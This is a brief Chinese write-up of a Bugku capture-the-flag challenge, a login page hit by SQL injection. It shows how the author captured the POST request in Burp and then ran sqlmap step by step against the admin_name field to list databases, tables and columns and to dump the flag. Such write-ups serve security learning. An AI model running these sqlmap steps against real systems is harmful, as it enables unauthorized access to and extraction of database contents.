打开http://123.206.87.240:9001/sql/后是个登陆界面
查看源代码
于是考虑到sql注入,因为是post,所以将burp的抓到的包保存到1.txt中,用sqlmap抓包
命令:sqlmap.py -r 1.txt -p admin_name --dbs//爆数据库名
后续在保表、列以及数据
命令sqlmap.py -r 1.txt -p admin_name -D bugkusql1 --tables//爆表名
命令sqlmap.py -r 1.txt -p admin_name -D bugkusql1 -T flag1 --columns// 爆列名字
命令sqlmap.py -r 1.txt -p admin_name -D bugkusql1-T flag1 -C flag1 --dump//爆flag
最后得到flag!!!
bugku-这是一个神奇的登陆框
最新推荐文章于 2019-09-30 15:24:24 发布